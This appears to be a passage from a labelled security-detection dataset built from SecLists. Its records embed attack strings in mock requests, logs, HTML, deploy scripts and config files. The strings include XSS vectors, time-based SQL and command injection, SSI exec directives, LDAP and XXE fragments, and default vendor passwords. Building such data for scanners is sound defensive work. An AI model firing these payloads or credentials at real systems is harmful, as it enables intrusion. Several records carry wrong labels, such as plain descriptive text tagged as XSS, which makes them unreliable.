\"http://x.x.x.x:22/\"> %dtd;]><xxx/>]]></foo></soap:Body>", "injection_type": "XXE"}}]} {"id": "seclists_02900", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: xs-sniper</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: xs-sniper", "injection_type": "XSS"}}]} {"id": "seclists_02901", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">JavaScript Includes</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript Includes", "injection_type": "XSS"}}]} {"id": "seclists_02902", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:epvjb6", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "epvjb6"}}]} {"id": "seclists_02903", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_02904", "source": "seclists", "source_license": "MIT", "text": "password: aquarius\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "aquarius"}}]} {"id": "seclists_02905", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:dogman@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dogman"}}]} {"id": "seclists_02906", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:U.S. Robotics,support,support,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "U.S. Robotics,support,support,"}}]} {"id": "seclists_02907", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <IMG LOWSRC=\"javascript:alert('XSS');\">\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG LOWSRC=\"javascript:alert('XSS');\">", "injection_type": "XSS"}}]} {"id": "seclists_02908", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc>", "injection_type": "XSS"}}]} {"id": "seclists_02909", "source": "seclists", "source_license": "MIT", "text": "filename=a)|id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a)|id", "injection_type": "cmd"}}]} {"id": "seclists_02910", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = )) or benchmark(10000000,MD5(1))#", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")) or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_02911", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Name contained XSS variant 1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Name contained XSS variant 1", "injection_type": "XSS"}}]} {"id": "seclists_02912", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = )) or sleep(__TIME__)='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")) or sleep(__TIME__)='", "injection_type": "SQL"}}]} {"id": "seclists_02913", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"script_name\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"script_name\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02914", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02915", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1=1 /* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1 /*", "injection_type": "SQL"}}]} {"id": "seclists_02916", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_02917", "source": "seclists", "source_license": "MIT", "text": "filename=%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_02918", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%201%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%201%20-ne%20%24%28echo%20QPUCUQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02919", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf (", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(", "injection_type": "cmd"}}]} {"id": "seclists_02920", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02921", "source": "seclists", "source_license": "MIT", "text": "filename=\\x3C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x3C", "injection_type": "cmd"}}]} {"id": "seclists_02922", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<article oncopy=\"alert(1)\" contenteditable>test</article> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<article oncopy=\"alert(1)\" contenteditable>test</article>", "injection_type": "XSS"}}]} {"id": "seclists_02923", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or 0=0 #", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 0=0 #", "injection_type": "SQL"}}]} {"id": "seclists_02924", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:72d5tn", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "72d5tn"}}]} {"id": "seclists_02925", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#exec cmd=\"cd C:\\WINDOWS\\System32\">\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#exec cmd=\"cd C:\\WINDOWS\\System32\">", "injection_type": "SSI"}}]} {"id": "seclists_02926", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <BODY ONLOAD=alert('XSS')>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <BODY ONLOAD=alert('XSS')>", "injection_type": "XSS"}}]} {"id": "seclists_02927", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes x{}</style><noframes style=\"animation-name:x\" onanimationstart=\"alert(1)\"></noframes></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><noframes style=\"animation-name:x\" onanimationstart=\"alert(1)\"></noframes>", "injection_type": "XSS"}}]} {"id": "seclists_02928", "source": "seclists", "source_license": "MIT", "text": "username=\");waitfor delay '0:0:__TIME__'--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\");waitfor delay '0:0:__TIME__'--", "injection_type": "SQL"}}]} {"id": "seclists_02929", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: *)(uid=*))(|(uid=*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*)(uid=*))(|(uid=*", "injection_type": "LDAP"}}]} {"id": "seclists_02930", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf id%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "id%00", "injection_type": "cmd"}}]} {"id": "seclists_02931", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"", "injection_type": "cmd"}}]} {"id": "seclists_02932", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=..%255c HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%255c", "injection_type": "cmd"}}]} {"id": "seclists_02933", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector uses with() to activate the payload behind the fragment identifier. No dots are used to enable easier filter evasion.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector uses with() to activate the payload behind the fragment identifier. No dots are used to enable easier filter evasion.", "injection_type": "XSS"}}]} {"id": "seclists_02934", "source": "seclists", "source_license": "MIT", "text": "filename=\\u003C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\u003C", "injection_type": "cmd"}}]} {"id": "seclists_02935", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NDPSSM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02936", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"tz\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"tz\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02937", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<i onmousedown=\"alert(1)\">test</i>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<i onmousedown=\"alert(1)\">test</i>", "injection_type": "XSS"}}]} {"id": "seclists_02938", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = (||6)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(||6)", "injection_type": "SQL"}}]} {"id": "seclists_02939", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><hr id=x tabindex=1 onbeforeactivate=alert(1)></hr></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr>", "injection_type": "XSS"}}]} {"id": "seclists_02940", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=PRINT HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "PRINT", "injection_type": "SQL"}}]} {"id": "seclists_02941", "source": "seclists", "source_license": "MIT", "text": "password: Loglogic,toor,logapp,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Loglogic,toor,logapp,"}}]} {"id": "seclists_02942", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Super basic HTML breaker 2</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Super basic HTML breaker 2", "injection_type": "XSS"}}]} {"id": "seclists_02943", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Basic single quoted attribute breaker HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Basic single quoted attribute breaker", "injection_type": "XSS"}}]} {"id": "seclists_02944", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02945", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 1=1--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_02946", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<dl oncut=\"alert(1)\" contenteditable>test</dl>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dl oncut=\"alert(1)\" contenteditable>test</dl>", "injection_type": "XSS"}}]} {"id": "seclists_02947", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN//", "injection_type": "cmd"}}]} {"id": "seclists_02948", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:WAAV,admin,waav,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "WAAV,admin,waav,"}}]} {"id": "seclists_02949", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\nx' or name()='username' or 'x'='y", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "x' or name()='username' or 'x'='y", "injection_type": "XXE"}}]} {"id": "seclists_02950", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ?x=", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "?x=", "injection_type": "cmd"}}]} {"id": "seclists_02951", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Self-contained XSS variant 5\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Self-contained XSS variant 5", "injection_type": "XSS"}}]} {"id": "seclists_02952", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: top.__proto__._= alert\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: top.__proto__._= alert", "injection_type": "XSS"}}]} {"id": "seclists_02953", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"from\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"from\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02954", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=IBM,qsysopr,qsysopr,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,qsysopr,qsysopr,"}}]} {"id": "seclists_02955", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=update HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "update", "injection_type": "SQL"}}]} {"id": "seclists_02956", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\00\\00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\00\\00", "injection_type": "cmd"}}]} {"id": "seclists_02957", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IYHUSO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02958", "source": "seclists", "source_license": "MIT", "text": "password: sinister\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sinister"}}]} {"id": "seclists_02959", "source": "seclists", "source_license": "MIT", "text": "password: Flowpoint,<BLANK>,password,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Flowpoint,<BLANK>,password,"}}]} {"id": "seclists_02960", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..%bg%qf", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%bg%qf", "injection_type": "cmd"}}]} {"id": "seclists_02961", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<video onkeyup=\"alert(1)\" contenteditable>test</video>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<video onkeyup=\"alert(1)\" contenteditable>test</video>", "injection_type": "XSS"}}]} {"id": "seclists_02962", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: JSON based obfuscated onload vector\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: JSON based obfuscated onload vector", "injection_type": "XSS"}}]} {"id": "seclists_02963", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or sleep(__TIME__)# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or sleep(__TIME__)#", "injection_type": "SQL"}}]} {"id": "seclists_02964", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<body onfocus=alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onfocus=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_02965", "source": "seclists", "source_license": "MIT", "text": "filename=%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02966", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%204%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%204%20-ne%20%24%28echo%20PCTUKX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_02967", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GFPZMF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_02968", "source": "seclists", "source_license": "MIT", "text": "password: joung\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "joung"}}]} {"id": "seclists_02969", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<svg><slot onload=alert(1)></slot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><slot onload=alert(1)></slot>", "injection_type": "XSS"}}]} {"id": "seclists_02970", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EEDNGD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02971", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: This vector creates an alert like message boy via Visual Basic Script\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector creates an alert like message boy via Visual Basic Script", "injection_type": "XSS"}}]} {"id": "seclists_02972", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin'or 1=1 or ''='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin'or 1=1 or ''='", "injection_type": "SQL"}}]} {"id": "seclists_02973", "source": "seclists", "source_license": "MIT", "text": "filename=<IMG SRC=\"javascript:alert('XSS');\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"javascript:alert('XSS');\">", "injection_type": "cmd"}}]} {"id": "seclists_02974", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_02975", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Verizon,admin,password,http://www22.verizon.com/Support/Residential/Internet/fiosinternet/networking/setup/vz9100em/124043.htm\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Verizon,admin,password,http://www22.verizon.com/Support/Residential/Internet/fiosinternet/networking/setup/vz9100em/124043.htm"}}]} {"id": "seclists_02976", "source": "seclists", "source_license": "MIT", "text": "filename=\"><script>\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><script>\"", "injection_type": "cmd"}}]} {"id": "seclists_02977", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"><script>alert(1)</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><script>alert(1)</script>", "injection_type": "cmd"}}]} {"id": "seclists_02978", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=%3Cx onxxx=alert(1) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Cx onxxx=alert(1)", "injection_type": "XSS"}}]} {"id": "seclists_02979", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><table onbeforecopy=\"alert(1)\" contenteditable>test</table></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<table onbeforecopy=\"alert(1)\" contenteditable>test</table>", "injection_type": "XSS"}}]} {"id": "seclists_02980", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><base onmouseup=\"alert(1)\">test</base></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<base onmouseup=\"alert(1)\">test</base>", "injection_type": "XSS"}}]} {"id": "seclists_02981", "source": "seclists", "source_license": "MIT", "text": "password: 3COM,security,security,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "3COM,security,security,"}}]} {"id": "seclists_02982", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><fieldset onblur=alert(1) tabindex=1 